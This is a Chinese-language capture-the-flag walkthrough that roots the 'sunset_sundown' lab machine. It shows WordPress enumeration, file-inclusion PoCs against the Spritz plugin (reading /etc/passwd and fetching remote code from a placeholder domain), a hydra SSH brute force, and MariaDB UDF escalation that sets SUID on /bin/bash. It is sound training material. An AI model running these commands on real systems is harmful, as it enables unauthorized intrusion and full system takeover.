sunset_sundown 靶机

信息收集

┌──(kali㉿kali)-[~/Documents/sunset_sundown]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.152                                     
[sudo] password for kali: 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-11 06:01 EDT
Nmap scan report for 192.168.56.152
Host is up (0.000091s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:A1:1B:DA (Oracle VirtualBox virtual NIC)

Web 渗透

暴露面很少，先看 80 端口

应该是个 wordpress 网站，用 wpscan 扫一下

┌──(kali㉿kali)-[~/Documents/sunset_sundown]
└─$ wpscan --url http://192.168.56.152/ -e u,ap          

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.38 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://192.168.56.152/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.56.152/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.56.152/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.56.152/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.56.152/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
 | Found By: Rss Generator (Passive Detection)
 |  - http://192.168.56.152/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
 |  - http://192.168.56.152/comments/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>

[+] WordPress theme in use: twentynineteen
 | Location: http://192.168.56.152/wp-content/themes/twentynineteen/
 | Last Updated: 2023-03-29T00:00:00.000Z
 | Readme: http://192.168.56.152/wp-content/themes/twentynineteen/readme.txt
 | [!] The version is out of date, the latest version is 2.5
 | Style URL: http://192.168.56.152/wp-content/themes/twentynineteen/style.css?ver=1.5
 | Style Name: Twenty Nineteen
 | Style URI: https://wordpress.org/themes/twentynineteen/
 | Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 | Confirmed By: Css Style In 404 Page (Passive Detection)
 |
 | Version: 1.5 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.56.152/wp-content/themes/twentynineteen/style.css?ver=1.5, Match:  Version: 1.5 

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] wp-with-spritz
 | Location: http://192.168.56.152/wp-content/plugins/wp-with-spritz/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2015-08-20T20:15:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | Version: 4.2.4 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.56.152/wp-content/plugins/wp-with-spritz/readme.txt

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <======================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://192.168.56.152/wp-json/wp/v2/users/?per_page=100&page=1
 |  Rss Generator (Aggressive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

发现了一个插件，搜一搜有没有漏洞

┌──(kali㉿kali)-[~/Documents/sunset_sundown]
└─$ searchsploit spritz                        
----------------------------------------------------------------
 Exploit Title       |  Path
----------------------------------------------------------------
WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion                       | php/webapps/44544.php
----------------------------------------------------------------
Shellcodes: No Results

存在文件包含漏洞，文件中给出了两个 PoC

/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd

/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http(s)://domain/exec

先尝试本地文件包含

成功了，发现了一个用户名 carlos ，接下来尝试访问常见的敏感文件，包括 shadow 文件、wordpress 配置文件、ssh 私钥文件、apache 日志文件

唯一有收获的就是 wordpress 配置文件

发现了数据库密码，尝试使用此密码来 ssh 登录、wordpress 登录。均失败

尝试使用插件的第二个 PoC 来测试远程文件包含漏洞，但是遇到了问题，虽然访问了远程文件，可是却没有被 PHP 解析，反弹 shell 失败

SSH 爆破

接下来尝试了使用 carlos 用户直接爆破其 ssh 密码，以及爆破 wordpress 中 admin 的密码。

┌──(kali㉿kali)-[~/Documents/sunset_sundown]
└─$ hydra -l carlos -P /usr/share/wordlists/rockyou.txt 192.168.56.152 ssh
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-10-11 22:45:31
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.56.152:22/
[22][ssh] host: 192.168.56.152   login: carlos   password: carlos
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.

爆破得到了 ssh 登录的密码，登录后查看

┌──(kali㉿kali)-[~/Documents/sunset_sundown]
└─$ ssh carlos@192.168.56.152              
carlos@192.168.56.152\'s password: 
Linux sundown 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64

The programs included with the Debian GNU/Linux system are free software;

carlos@sundown:~$ sudo -l
[sudo] password for carlos: 
Sorry, user carlos may not run sudo on sundown.

提权之信息收集

查看环境和家目录文件

carlos@sundown:~$ ls -alih
total 28K
134541 drwxr-xr-x 3 carlos carlos 4.0K Aug  3  2020 .
131078 drwxr-xr-x 3 root   root   4.0K Aug  3  2020 ..
134958 lrwxrwxrwx 1 root   root      9 Aug  3  2020 .bash_history -> /dev/null
134542 -rw-r--r-- 1 carlos carlos  220 Aug  3  2020 .bash_logout
134544 -rw-r--r-- 1 carlos carlos 3.5K Aug  3  2020 .bashrc
135949 drwxr-xr-x 3 carlos carlos 4.0K Aug  3  2020 .local
134977 -rw------- 1 carlos carlos   33 Aug  3  2020 local.txt
135567 lrwxrwxrwx 1 root   root      9 Aug  3  2020 .mysql_history -> /dev/null
134543 -rw-r--r-- 1 carlos carlos  807 Aug  3  2020 .profile
carlos@sundown:~$ cat local.txt
28f84888f6bd690e321cba14659b32f2

查看 SUID 文件

carlos@sundown:~$ find / -type f -perm -04000 -ls 2>/dev/null
    10540    428 -rwsr-xr-x   1 root     root       436552 Jan 31  2020 /usr/lib/openssh/ssh-keysign
   136894     12 -rwsr-xr-x   1 root     root        10232 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
     6833     52 -rwsr-xr--   1 root     messagebus    51184 Jul  5  2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
     3910     36 -rwsr-xr-x   1 root     root          34888 Jan 10  2019 /usr/bin/umount
     3436     44 -rwsr-xr-x   1 root     root          44440 Jul 27  2018 /usr/bin/newgrp
       55     84 -rwsr-xr-x   1 root     root          84016 Jul 27  2018 /usr/bin/gpasswd
     3583     64 -rwsr-xr-x   1 root     root          63568 Jan 10  2019 /usr/bin/su
     3908     52 -rwsr-xr-x   1 root     root          51280 Jan 10  2019 /usr/bin/mount
    17572    156 -rwsr-xr-x   1 root     root         157192 Feb  2  2020 /usr/bin/sudo
       53     44 -rwsr-xr-x   1 root     root          44528 Jul 27  2018 /usr/bin/chsh
       56     64 -rwsr-xr-x   1 root     root          63736 Jul 27  2018 /usr/bin/passwd
       52     56 -rwsr-xr-x   1 root     root          54096 Jul 27  2018 /usr/bin/chfn

尝试使用数据库密码来切换登录到 root，失败

尝试登录数据库后，查看哈希值，得到的哈希值于在线网站碰撞失败

UDF 提权

突然想到有没有可能，数据库的密码一直没用上是因为在提权阶段才会使用到，接下来查看一下 mysql 的运行状态，是否是 root 运行，考虑 UDF 提权

carlos@sundown:/tmp$ ps aux | grep mysql
root       357  0.0  0.0   2388   696 ?        Ss   05:59   0:00 /bin/sh -c /usr/sbin/mysqld
root       361  0.1 11.7 1284380 119124 ?      Sl   05:59   0:18 /usr/sbin/mysqld
carlos    1710  0.0  0.0   6076   824 pts/0    S+   09:01   0:00 grep mysql

可以尝试，看看满不满足 UDF 提权的必要条件

MariaDB [wordpress_db]> show variables like '%secure_file_priv%';
+------------------+-------+
| Variable_name    | Value |
+------------------+-------+
| secure_file_priv |       |
+------------------+-------+
1 row in set (0.001 sec)

MariaDB [(none)]> show variables like '%plugin%';
+-----------------+--------------------------------------------+
| Variable_name   | Value                                      |
+-----------------+--------------------------------------------+
| plugin_dir      | /usr/lib/x86_64-linux-gnu/mariadb19/plugin/|
| plugin_maturity | gamma                                      |
+-----------------+--------------------------------------------+

有搞头，看了看 plugin 目录的权限，无法直接写入，那就考虑直接通过 MySQL 写入。使用的是 MySQL UDF 提权十六进制查询 | 国光 (sqlsec.com) 记得修改写入的插件目录

MariaDB [(none)]> CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so';
Query OK, 0 rows affected (0.000 sec)

MariaDB [(none)]> select * from mysql.func;
+----------+-----+--------+----------+
| name     | ret | dl     | type     |
+----------+-----+--------+----------+
| sys_eval |   0 | udf.so | function |
+----------+-----+--------+----------+
1 row in set (0.000 sec)

MariaDB [(none)]> select sys_eval('whoami');
+--------------------+
| sys_eval('whoami') |
+--------------------+
| root               |
+--------------------+
1 row in set (0.005 sec)

提权成功，想反弹 shell 但是没法得到稳定的 shell，那把 bash 文件加上 S 权限吧

MariaDB [(none)]> select sys_eval('chmod +s /bin/bash');
+--------------------------------+
| sys_eval('chmod +s /bin/bash') |
+--------------------------------+
| NULL                           |
+--------------------------------+
1 row in set (0.004 sec)

MariaDB [(none)]> select sys_eval('ls -liah /bin/bash');
+---------------------------------------------------------+
| sys_eval('ls -liah /bin/bash')                          |
+---------------------------------------------------------+
| 1411 -rwsr-sr-x 1 root root 1.2M Apr 18  2019 /bin/bash |
+---------------------------------------------------------+
1 row in set (0.004 sec)

这样就可以直接使用 /bin/bash -p 来直接运行 root 的 shell 了

bash-5.0# cd /root
bash-5.0# ls
proof.txt
bash-5.0# cat proof.txt
                              _____,,,\//,,\\,/,
                             /-- --- --- -----
                            ///--- --- -- - ----
                           o////- ---- --- --
                           !!//o/---  -- --
                         o*) !///,~,,\\,\/,,/,//,,
                           o!*!o'(\          /\
                         | ! o ",) \/\  /\  /  \/\
                        o  !o! !!|    \/  \/     /
                       ( * (  o!'; |\   \       /
                        o o ! * !` | \  /       \
                       o  |  o 'o| | :  \       /
                        *  o !*!': |o|  /      /
                            (o''| `| : /      /
                            ! *|'`  \|/       \\
                           ' !o!':\  \\        \
                            ( ('|  \  `._______/
////\\\,,\///,,,,\,/oO._*  o !*!'`  `.________/
  ---- -- ------- - -oO*OoOo (o''|           /
    --------  ------ 'oO*OoO!*|'o!!          \
-------  -- - ---- --* oO*OoO *!'| '         /
 ---  -   -----  ---- - oO*OoO!!':o!'       /
 - -  -----  -  --  - *--oO*OoOo!`         /
   \\\\\,,,\\,//////,\,,\\\/,,,\,,ejm/AMC

510252fabb4b7e7dddd7373b7b3da3e8

Thanks for playing - Felipe Winsnes (@whitecr0wz)

最后的定妆照

bash-5.0# whoami
root
bash-5.0# id
uid=1000(carlos) gid=1000(carlos) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),1000(carlos)
bash-5.0# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:a1:1b:da brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.152/24 brd 192.168.56.255 scope global dynamic enp0s3
       valid_lft 399sec preferred_lft 399sec
    inet6 fe80::a00:27ff:fea1:1bda/64 scope link 
       valid_lft forever preferred_lft forever
bash-5.0# uname -a
Linux sundown 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 GNU/Linux